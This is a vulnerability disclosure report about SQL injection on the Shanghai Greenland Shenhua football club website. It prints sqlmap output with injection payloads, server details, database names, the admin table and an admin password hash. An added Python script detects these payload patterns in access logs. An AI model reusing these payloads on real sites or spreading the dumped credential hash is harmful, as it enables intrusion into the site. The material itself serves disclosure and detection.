Shanghai Greenland Shenhua Football Club official website has SQL injection (DBA permission)
As in the title.
Shanghai Greenland Shenhua Football Club official website:
http://**.**.**.**
The vulnerability exists in:
http://**.**/news.php?category=41
http://**.**/news_detail.php?newsid=5232
http://**.**/news_detail.php?newsid=5231
http://**.**/news_detail.php?newsid=5229
http://**.**/news_detail.php?newsid=5227
...
...
Taking the first URL as the test case, the injection types and server configuration:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=41 AND 7007=7007
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: category=41 AND (SELECT 6357 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(6357=6357,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: category=-7274 UNION ALL SELECT NULL,CONCAT(0x7170627071,0x624c4f57546b436a44727a564167626e70504977547a67627552656749564f744367667953665943,0x716a787171)--
    Vector: UNION ALL SELECT NULL,[QUERY]--
---
[12:17:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Databases:
Available databases [5]:
[*] information_schema
[*] mysql
[*] phplampDB
[*] shenhuafc
[*] test
Users:
Database management system users [7]:
[*] ''@'H00CNSHJVFCW01'
[*] ''@'localhost'
[*] 'phplamp'@'localhost'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'H00CNSHJVFCW01'
[*] 'root'@'localhost'
Whether the current user is a DBA:
Current user is DBA: True
All tables in the shen1_fc database:
Database: shen1_fc
[33 tables]
+--------------------+
| sh_coach_info      |
| sh_coach_list      |
| sh_coach_type      |
| sh_coutry          |
| sh_document        |
| sh_document_file   |
| sh_ematches        |
| sh_goal_list       |
| sh_img_category    |
| sh_imgfiles        |
| sh_imgs            |
| sh_league          |
| sh_league_result   |
| sh_match_his       |
| sh_matches         |
| sh_matches_type    |
| sh_members         |
| sh_members_list    |
| sh_news            |
| sh_newscategory    |
| sh_newsfile        |
| sh_play_list       |
| sh_position        |
| sh_round           |
| sh_seasons         |
| sh_slider          |
| sh_slider_config   |
| sh_team_sort       |
| sh_teams           |
| sh_video_files     |
| sh_videocategory   |
| sh_videos          |
| web_administrators |
+--------------------+
The web_administrators table:
Database: shen1_fc
Table: web_administrators
[1 entry]
+------------+---------+------------+----------------------------------+---------+-----+----------+
| initialize | loginip | logintime  | password                         | regtime | uid | username |
+------------+---------+------------+----------------------------------+---------+-----+----------+
| 1          | unknown | 1448935165 | 567ba5580207d687b73412b96d5e86da | 0       | 1   | admin    |
+------------+---------+------------+----------------------------------+---------+-----+----------+
Testing stopped at this point; I did not go any deeper.
Certified.
Solution:
No.
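
An added example, not part of the original report: a web access log check for the two numeric parameters listed above (category and newsid), labelling any non-numeric value by the three techniques that appear in the sqlmap output. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the report lists as injectable; both carry numeric IDs.
NUMERIC_PARAMS = {"category", "newsid"}

# Signatures for the three techniques shown in the sqlmap output.
TECHNIQUES = [
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I)),
    ("boolean-blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2015:12:17:10 +0800] "GET /news.php?category=41 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Dec/2015:12:17:11 +0800] "GET /news.php?category=41%20AND%207007%3D7007 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Dec/2015:12:17:12 +0800] "GET /news.php?category=41%20AND%20(SELECT%206357%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 812',
    '192.0.2.66 - - [01/Dec/2015:12:17:13 +0800] "GET /news.php?category=-7274%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 903',
    '192.0.2.66 - - [01/Dec/2015:12:17:14 +0800] "GET /news_detail.php?newsid=5232%27 HTTP/1.1" 200 0',
]

def classify(value):
    """Return None for a purely numeric value, else a technique label."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric"  # unexpected for an ID, but no known signature

def scan(lines):
    """Return (line_number, parameter, label) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value) if name.lower() in NUMERIC_PARAMS else None
            if label:
                findings.append((n, name, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule, enforced in the application before the value reaches the query, together with a parameterized statement, closes the injection point itself.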